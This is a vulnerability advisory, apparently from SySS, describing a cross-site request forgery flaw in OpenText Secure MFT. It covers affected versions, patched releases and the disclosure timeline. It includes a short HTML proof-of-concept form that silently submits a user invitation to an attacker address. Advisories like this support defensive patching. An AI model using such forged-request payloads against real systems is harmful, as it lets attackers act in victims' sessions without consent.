Product: Secure MFT
Vendor: http://www.opentext.com
Affected Version(s): 2013 R3, 2014 R1/R2, 2015 R1
Tested Version(s): 2014 R2 SP4
Vulnerability Type: Cross-Site Request Forgery (CWE-352)
Risk Level: Medium
Solution Status: Fixed
Vendor Notification: 2015-08-05
Solution Date: 2015-09-23
Public Disclosure: 2015-10-02
CVE Reference: Not yet assigned
Author of Advisory: Dr. Adrian Vollmer
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Overview:
Secure MFT aims to replace FTP or file transfer via e-mail by providing a
secure and easy-to-use alternative. Users can send each other files of
practically any size either by using a Microsoft Windows client, a Microsoft
Outlook plugin or a web application.
The software manufacturer describes the application as follows
(see [1]):
"OpenText Secure MFT is an enterprise-grade managed file transfer solution
that delivers uncompromising security to safely exchange large files."
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vulnerability Details:
The web application is vulnerable to Cross-Site Request Forgery since no
tokens are used to prevent this kind of attack.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Proof of Concept (PoC):
As a proof of concept, the following HTML document could be used by an
attacker to perform actions in the context of the victim if the attacker
manages to trick the victim into opening the document in their browser.
<html>
<body>
<form action="https://[Secure MFT host]/userinvitation" method="POST">
<input type="hidden" name="email" value="attacker@example.org" />
<input type="hidden" name="subject" value="CSRF Invite" />
<input type="hidden" name="message" value="CSRF Message" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Solution:
Update Secure MFT to one of the following versions or newer:
* Secure MFT 2013 R3 SP7
* Secure MFT 2014 R1 SP11
* Secure MFT 2014 R2 SP5
* Secure MFT 2015 R1 SP1
* Secure MFT 2015 R1 FP1 SP1
Software updates are available at [5]. For further information, see [4].
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Disclosure Timeline:
2015-07-01: Vulnerability discovered
2015-08-05: Vulnerability reported to vendor
2015-09-23: Vendor publishes security alert
2015-10-02: Public release of security advisory according to the SySS
Responsible Disclosure Policy
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
References:
[1] Web site of Secure MFT
https://www.opentext.com/what-
[2] SySS Security Advisory SYSS-2015-039
https://www.syss.de/fileadmin/
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/news/
[4] https://knowledge.opentext.
[5] https://knowledge.opentext.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Credits:
This security vulnerability was found by Dr. Adrian Vollmer of the SySS GmbH.
E-Mail: adrian.vollmer (at) syss.de
Key fingerprint = 70CF E88C AEE7 DB0F 5DC8 3403 0E02 7C7E 037C 9FE7
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Disclaimer:
The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Copyright:
Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/
Komentarų nėra:
Rašyti komentarą